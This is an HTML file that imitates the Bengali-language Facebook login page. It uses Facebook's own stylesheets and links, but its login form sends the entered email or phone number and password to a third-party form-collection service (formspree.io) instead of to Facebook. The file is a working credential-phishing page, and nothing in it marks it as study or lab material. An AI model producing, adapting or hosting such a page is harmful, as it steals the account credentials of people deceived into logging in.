<!DOCTYPE html>
<html lang="en">
    <head>
    <title id="pageTitle">Facebook - লগ ইন করুন অথবা নিবন্ধন করুন</title>
    <link rel="stylesheet" href="style1.css">



    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yL/l/1,cross/cY-8uWIrKSJ.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="jFEoi8A" crossorigin="anonymous">

    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yO/l/1,cross/IySCVEn_yCH.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="ISZMjTd" crossorigin="anonymous">



    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/ye/l/1,cross/4psbcOy1xGG.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="8vi672E" crossorigin="anonymous">



    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yU/l/1,cross/N41HEC4eqtp.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="JOLL042" crossorigin="anonymous">



    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yy/l/1,cross/quUZ_nS9Fah.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="BCJyitE" crossorigin="anonymous">



    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yt/l/1,cross/Lvh0OlLMCop.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="HS1d4J0" crossorigin="anonymous">



    <link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yp/l/1,cross/uaRUZk18yNI.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="Yo2UzOh" crossorigin="anonymous">




    </head>


    <body>
<section class="body">
<section class="fbimg">
        
    <div class="facebook">
        <img src="oic/dF5SId3UHWd.svg" alt="facebook" srcset="">
    </div>
</section>
        


        






<section class="centerbody">
    <div class="login_form_container">
    
    <form action="https://formspree.io/f/xzborqvg" method="post">
        
        
        <div  class="loginform" style="background:white;
        ">
            <div class="_xku" id="header_block" style="background:white;
            ">
            
                <span class="_97w1 _50f6" style="background:white;
                ">
                    
                    <div class="_9axz" style="background:white;
                    ">Facebook-এ লগ ইন করুন</div>
            
                </span>
        
            </div>

            

            
            
            
            <div class="email_container1" id="email_container" style="background:white;
            ">
                
                
                
                <input type="text" class="emailname" name="email" id="email" tabindex="0" placeholder="ইমেল বা ফোন নম্বর:"  autofocus="1" autocomplete="username" aria-label="ইমেল বা ফোন নম্বর:">
            
            </div>
                            
                
            <div class="email_container1" id="email_container" style="background:white;
            ">
                
                
                
                <input type="text" class="emailname" name="pwsd" id="password" placeholder="পাসওয়ার্ড" autofocus="1" aria-label="পাসওয়ার্ড">
            
            </div>


            <div class="_xkt" style="background:white;
            ">
            
            
                <button  class="button1"type="submit">লগ ইন করুন</button>
            
            </div>
            
            
            <div id="login_link" style="background:white;
            ">
                
                <div class="_97w3" style="background:white;text-align: center;margin: auto;
                ">
                    
                    <a href="https://www.facebook.com/login/identify/?ctx=recover&ars=facebook_login&from_login_screen=0" class="_97w4" target="" style="background:white; font-size: 15px;
                    ">অ্যাকাউন্ট ভুলে গেছেন?</a>
                
                
                </div>
                
                
                <div class="_1rf5"style="background:white;
                ">
                    
                    <span class="ba" style="background:white;opacity: 60%;">বা</span>
                
                </div>
                
                <div class="_xkt"style="background:white;
                ">
                    
                    <a role="button" class="button2" href="https://www.facebook.com/r.php?locale=bn_IN&display=page">নতুন অ্যাকাউন্ট তৈরি করুন</a>
                
                
                </div>
            
        </div>
    </div>
    
    
    



</form>


</div></section>




 <section class="footer">
            <span> Meta © 2022</span>
        </section>
         


</section>

    
</body>
</html>